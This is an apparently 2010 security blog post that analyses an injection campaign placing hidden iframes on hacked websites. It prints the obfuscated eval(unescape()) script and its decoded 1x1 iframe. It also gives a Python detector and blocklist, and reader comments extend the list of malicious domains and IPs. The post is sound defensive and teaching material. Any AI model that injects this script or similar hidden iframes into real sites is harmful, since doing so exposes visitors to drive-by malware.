
Geezter, Qawfer and Other Malicious Iframes From 121 .156 .57 .184

   29 Sep 10   Filed in Short Attack Reviews, Website exploits

This is a short post about one of the ongoing attacks. It injects the following script, usually at the very bottom of the HTML:

<s cript>e val(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%63%70%6F%6F%2E%63%6F%6D%2F%3F%37%30%35%38%39%30%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

This script can be detected by Unmask Parasites.

Once executed, this code injects the following hidden iframe:

<i frame src="http://bocpoo.com/?705890" width=1 height=1></iframe>

On Google’s diagnostics pages of infected sites you’ll see words like:

Malicious software is hosted on 2 domain(s), including geezter .com/, bocpoo .com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including bocpoo .com/.

This attack uses many different domain names (the script content changes accordingly): artode .com, astnop .com, awotbop .com, baaswer .com, bedfer .com, biawwer .com, bocpoo .com, cedfer .com, chutnot .com, qawfer .com, geezter .com, minpoo.com, podfer .com, pukfer .com, redpoo .com, verfer.com, iseyh .com. All these domain names point to the IP address 121 .156 .57 .184, a server in South Korea (Korea Telecom). The domains are registered by Igor Nikenin from Rostov na Donu, Russia (this information may be fake).
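As an added example (not code from the original post or from Unmask Parasites), the following Python script shows how a defender can decode the eval(unescape(...)) payload shown above, extract the iframe it writes, flag the 1x1 hidden iframe, and check the target host against the domain and IP address list from this post. The sample HTML, the blocklist contents, the trailing-comment marker check and all function names are constructed for this example; the resolver parameter of resolves_to_known_ip exists only so the DNS check can be exercised offline.

```python
import re
import socket
from urllib.parse import urlparse

# Indicators taken from the post: domains serving the iframe and the two
# Korea Telecom IP addresses they point to (constructed blocklist; extend it
# with the additional domains from the comments as needed).
KNOWN_BAD_DOMAINS = {
    "artode.com", "astnop.com", "awotbop.com", "baaswer.com", "bedfer.com",
    "biawwer.com", "bocpoo.com", "cedfer.com", "chutnot.com", "qawfer.com",
    "geezter.com", "minpoo.com", "podfer.com", "pukfer.com", "redpoo.com",
    "verfer.com", "iseyh.com",
}
KNOWN_BAD_IPS = {"121.156.57.184", "121.156.57.185"}

# eval(unescape('...')) or eval(unescape("...")); group 2 is the encoded payload.
EVAL_UNESCAPE_RE = re.compile(
    r"""eval\s*\(\s*unescape\s*\(\s*(['"])(.*?)\1\s*\)\s*\)""",
    re.IGNORECASE | re.DOTALL,
)
# The injected block in the post ends with this HTML comment marker.
MARKER_RE = re.compile(r"<!--\s*uy7gdr5332rkmn\s*-->")
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name="v", name='v' or bare name=v
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def js_unescape(encoded: str) -> str:
    """Decode like JavaScript's unescape(): %XX bytes and %uXXXX code units."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, encoded)


def iframe_attrs(tag_body: str) -> dict:
    """Parse the attributes inside an <iframe ...> tag into a dict."""
    attrs = {}
    for m in ATTR_RE.finditer(tag_body):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def scan_html(html: str) -> list:
    """Find eval(unescape()) payloads that write an iframe and describe each."""
    findings = []
    for m in EVAL_UNESCAPE_RE.finditer(html):
        decoded = js_unescape(m.group(2))
        for tag in IFRAME_RE.finditer(decoded):
            attrs = iframe_attrs(tag.group(1))
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            findings.append({
                "src": src,
                "host": host,
                # 1x1 iframes are invisible to the visitor
                "hidden": attrs.get("width") == "1" and attrs.get("height") == "1",
                "known_bad": host in KNOWN_BAD_DOMAINS,
                # marker comment appears right after the closing </script> tag
                "marker_follows": MARKER_RE.search(html, m.end()) is not None,
                "decoded": decoded,
            })
    return findings


def resolves_to_known_ip(host: str, resolver=None) -> bool:
    """True if host currently resolves to one of the attack IP addresses.

    resolver(host) must return a list of IP strings; the default does a
    live DNS lookup, and lookup failures are treated as "not matching".
    """
    if resolver is None:
        resolver = lambda h: socket.gethostbyname_ex(h)[2]
    try:
        return any(ip in KNOWN_BAD_IPS for ip in resolver(host))
    except OSError:
        return False


# Constructed sample page carrying the injection exactly as the post shows it.
SAMPLE_HTML = (
    "<html><body><p>hello</p>\n"
    "<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27"
    "%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%63%70"
    "%6F%6F%2E%63%6F%6D%2F%3F%37%30%35%38%39%30%22%20%77%69%64%74%68%3D%31%20"
    "%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>"
    "<!-- uy7gdr5332rkmn -->\n</body></html>"
)

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"iframe -> {f['src']} hidden={f['hidden']} "
              f"known_bad={f['known_bad']} marker={f['marker_follows']}")
        print("decoded:", f["decoded"])
```

Running the script against the sample page decodes the payload to document.write('<iframe src="http://bocpoo.com/?705890" width=1 height=1></iframe>') and reports a hidden iframe pointing at a listed domain; because the attack rotates domains while keeping the same hosting IP, the resolves_to_known_ip check catches new names that the static list has not caught up with yet.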

Preliminary review of hacked sites makes me think that this attack uses stolen FTP credentials. Although I don't have strong evidence at this point, it's always a good idea to scan computers that have access to hacked websites for malware and then change all site passwords. Refrain from saving passwords in FTP clients and try to use secure protocols (SFTP or FTPS) instead of FTP, which transfers passwords in plain text.

If you know more information about this attack please share it in the comments section below.


Reader's Comments (13)

  1. |

    [...] This post was mentioned on Twitter by Denis, Rhonda Kreklau. Rhonda Kreklau said: Geezter, Qawfer and Other Malicious Iframes From 12_156 _57_184 – Unmask Parasites blog – http://tinyurl.com/2egr75q [...]

  2. |

    More malicious domains:

    naurup .com
    saspoo .com

  3. |

    Another IP address is 121 .156 .57 .185, besides 121 .156 .57 .184. All malicious domains are: artode.com, astnop.com, bawset.com, bedfer.com, bedret.com, bocpoo.com, cedfer.com, cerpoo.com, goapoo.com, kevfer.com, kiwdor.com, lowtip.com, minpoo.com, nunpoo.com, oportwe.com, podfer.com, pukfer.com, qawfer.com, qiamhot.com, redpoo.com, saspoo.com, sedfer.com, sedpoo.com, verfer.com, wasplac.com, wazxer.com, xedfer.com, xedpoo.com, aferup.com, ajirup.com, astped.com, blidhu.com, cutped.com, daiehu.com, dainhu.com, dsionhu.com, eainhu.com, edsinhu.com, exdshu.com, iainhu.com, jikped.com, jorped.com, laarup.com, mokaped.com, naerup.com, naurup.com, nsishu.com, oisrup.com, outped.com, padrup.com, quaped.com, qutped.com, sienhu.com, silrup.com, tivped.com, todped.com, and uaerup.com (IP address 121.156.57.184), and biawwer.com, nuahnd.com, giaine.com, ksinne.com, ainerg.com, awotbop.com, geezter.com, baaswer.com, liaefr.com, wsinfr.com, aierfr.com, urinoor.com, naieerr.com, hianes.com, siinns.com, hinnws.com, niaekw.com, asonie.com, cdeinaa.com, chutnot.com, deetcor.com, gfinee.com, nasettg.com, neebver.com, nsieew.com, puntbar.com, sinesr.com, switbop.com, xeelpot.com, and zuubnot.com (IP address 121.156.57.185). I saw that whole list on MalwareURL (malwareurl.com).

  4. |

    Sorry, I meant xetpoo.com, not xedpoo.com.

  5. |

    Also from 121.156.57.185: aniess.com, butdt.com, dinwoo.com, einsien.com, gredet.com, horewdt.com, huffdt.com, and geerrge.com.

  6. |

    Before aferup.com on the top list (IP 121.156.57.184), I meant to list aedrup.com.

  7. |

    Also iseyh.com, basyh.com, and cattww.com.

  8. |

    New attacks are from 10 .net domains, which are: aeined.net, eadied.net, haeied.net, huaned.net, kaieed.net, laiaed.net, pidied.net, roaaed.net, verred.net, and wodied.net.